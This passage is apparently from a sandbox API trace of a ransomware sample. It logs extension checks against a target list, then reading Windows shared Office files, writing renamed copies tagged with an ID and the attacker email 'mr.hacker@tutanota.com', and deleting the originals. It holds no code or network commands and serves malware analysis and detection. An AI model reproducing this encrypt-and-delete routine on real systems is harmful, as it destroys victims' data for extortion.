returned 4 [0049.166] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.166] lstrlenW (lpString=".zip") returned 4 [0049.166] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.166] lstrlenW (lpString=".rar") returned 4 [0049.166] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.166] lstrlenW (lpString=".bz2") returned 4 [0049.166] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.166] lstrlenW (lpString=".7z") returned 3 [0049.166] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.166] lstrlenW (lpString=".dbf") returned 4 [0049.166] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.166] lstrlenW (lpString=".1cd") returned 4 [0049.166] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.166] lstrlenW (lpString=".jpg") returned 4 [0049.166] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.167] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.167] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0049.169] GetLastError () returned 0x0 [0049.169] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xa6c, lpOverlapped=0x0) returned 1 [0049.171] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xa70, lpOverlapped=0x0) returned 1 [0049.171] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0049.171] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.172] SetEndOfFile (hFile=0x204) returned 1 [0049.172] CloseHandle (hObject=0x204) returned 1 [0049.172] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.172] SetEndOfFile (hFile=0x218) returned 1 [0049.173] CloseHandle (hObject=0x218) returned 1 [0049.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.173] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 1 [0049.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.173] lstrlenW (lpString=".doc") returned 4 [0049.173] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.174] lstrlenW (lpString=".docx") returned 5 [0049.174] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.174] lstrlenW (lpString=".pdf") returned 4 [0049.174] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.174] lstrlenW (lpString=".xls") returned 4 [0049.174] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.174] lstrlenW (lpString=".xlsx") returned 5 [0049.174] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.174] lstrlenW (lpString=".ppt") returned 4 [0049.174] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.174] lstrlenW (lpString=".zip") returned 4 [0049.174] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.174] lstrlenW (lpString=".rar") returned 4 [0049.174] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.174] lstrlenW (lpString=".bz2") returned 4 [0049.174] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.174] lstrlenW (lpString=".7z") returned 3 [0049.174] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.174] lstrlenW (lpString=".dbf") returned 4 [0049.174] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.174] lstrlenW (lpString=".1cd") returned 4 [0049.174] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.174] lstrlenW (lpString=".jpg") returned 4 [0049.174] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.175] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=42453) returned 1 [0049.175] CloseHandle (hObject=0x218) returned 1 [0049.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 0x20 [0049.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.175] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0049.175] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.175] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.175] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0049.176] GetLastError () returned 0x0 [0049.176] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xa5d5, lpOverlapped=0x0) returned 1 [0049.178] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xa5e0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xa5e0, lpOverlapped=0x0) returned 1 [0049.179] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0049.179] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.180] SetEndOfFile (hFile=0x204) returned 1 [0049.180] CloseHandle (hObject=0x204) returned 1 [0049.180] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.180] SetEndOfFile (hFile=0x218) returned 1 [0049.181] CloseHandle (hObject=0x218) returned 1 [0049.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.181] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 1 [0049.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.181] lstrlenW (lpString=".doc") returned 4 [0049.181] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.181] lstrlenW (lpString=".docx") returned 5 [0049.181] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.181] lstrlenW (lpString=".pdf") returned 4 [0049.181] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.181] lstrlenW (lpString=".xls") returned 4 [0049.181] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.181] lstrlenW (lpString=".xlsx") returned 5 [0049.182] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.182] lstrlenW (lpString=".ppt") returned 4 [0049.182] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.182] lstrlenW (lpString=".zip") returned 4 [0049.182] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.182] lstrlenW (lpString=".rar") returned 4 [0049.182] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.182] lstrlenW (lpString=".bz2") returned 4 [0049.182] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.182] lstrlenW (lpString=".7z") returned 3 [0049.182] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.182] lstrlenW (lpString=".dbf") returned 4 [0049.182] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.182] lstrlenW (lpString=".1cd") returned 4 [0049.182] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.182] lstrlenW (lpString=".jpg") returned 4 [0049.182] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.183] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.183] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.183] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0049.185] GetLastError () returned 0x0 [0049.185] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x623, lpOverlapped=0x0) returned 1 [0049.186] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x630, lpOverlapped=0x0) returned 1 [0049.187] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0049.187] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.187] SetEndOfFile (hFile=0x204) returned 1 [0049.187] CloseHandle (hObject=0x204) returned 1 [0049.187] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.187] SetEndOfFile (hFile=0x218) returned 1 [0049.188] CloseHandle (hObject=0x218) returned 1 [0049.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.188] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 1 [0049.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.189] lstrlenW (lpString=".doc") returned 4 [0049.189] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.189] lstrlenW (lpString=".docx") returned 5 [0049.189] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.189] lstrlenW (lpString=".pdf") returned 4 [0049.189] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.189] lstrlenW (lpString=".xls") returned 4 [0049.189] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.189] lstrlenW (lpString=".xlsx") returned 5 [0049.189] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.189] lstrlenW (lpString=".ppt") returned 4 [0049.189] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.189] lstrlenW (lpString=".zip") returned 4 [0049.189] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.189] lstrlenW (lpString=".rar") returned 4 [0049.189] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.189] lstrlenW (lpString=".bz2") returned 4 [0049.189] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.189] lstrlenW (lpString=".7z") returned 3 [0049.189] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.189] lstrlenW (lpString=".dbf") returned 4 [0049.189] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.189] lstrlenW (lpString=".1cd") returned 4 [0049.189] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0049.189] lstrlenW (lpString=".jpg") returned 4 [0049.190] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.191] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=30170) returned 1 [0049.191] CloseHandle (hObject=0x218) returned 1 [0049.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 0x20 [0049.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0049.191] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.191] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0049.191] GetLastError () returned 0x0 [0049.192] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x75da, lpOverlapped=0x0) returned 1 [0049.193] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x75e0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x75e0, lpOverlapped=0x0) returned 1 [0049.195] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0049.195] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.195] SetEndOfFile (hFile=0x204) returned 1 [0049.195] CloseHandle (hObject=0x204) returned 1 [0049.195] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.195] SetEndOfFile (hFile=0x218) returned 1 [0049.196] CloseHandle (hObject=0x218) returned 1 [0049.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.196] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 1 [0049.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.196] lstrlenW (lpString=".doc") returned 4 [0049.196] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.196] lstrlenW (lpString=".docx") returned 5 [0049.196] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.196] lstrlenW (lpString=".pdf") returned 4 [0049.197] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.197] lstrlenW (lpString=".xls") returned 4 [0049.197] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.197] lstrlenW (lpString=".xlsx") returned 5 [0049.197] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.197] lstrlenW (lpString=".ppt") returned 4 [0049.197] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.197] lstrlenW (lpString=".zip") returned 4 [0049.197] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.197] lstrlenW (lpString=".rar") returned 4 [0049.197] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.197] lstrlenW (lpString=".bz2") returned 4 [0049.197] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.197] lstrlenW (lpString=".7z") returned 3 [0049.197] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.197] lstrlenW (lpString=".dbf") returned 4 [0049.197] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.197] lstrlenW (lpString=".1cd") returned 4 [0049.197] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.197] lstrlenW (lpString=".jpg") returned 4 [0049.197] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.198] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.198] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0049.199] GetLastError () returned 0x0 [0049.199] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x51a5b, lpOverlapped=0x0) returned 1 [0049.426] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x51a60, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x51a60, lpOverlapped=0x0) returned 1 [0049.434] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0049.434] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe4, lpOverlapped=0x0) returned 1 [0049.434] SetEndOfFile (hFile=0x204) returned 1 [0049.434] CloseHandle (hObject=0x204) returned 1 [0049.434] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.434] SetEndOfFile (hFile=0x218) returned 1 [0049.437] CloseHandle (hObject=0x218) returned 1 [0049.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.438] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 1 [0049.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.438] lstrlenW (lpString=".doc") returned 4 [0049.438] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.438] lstrlenW (lpString=".docx") returned 5 [0049.438] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0049.438] lstrlenW (lpString=".pdf") returned 4 [0049.438] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.438] lstrlenW 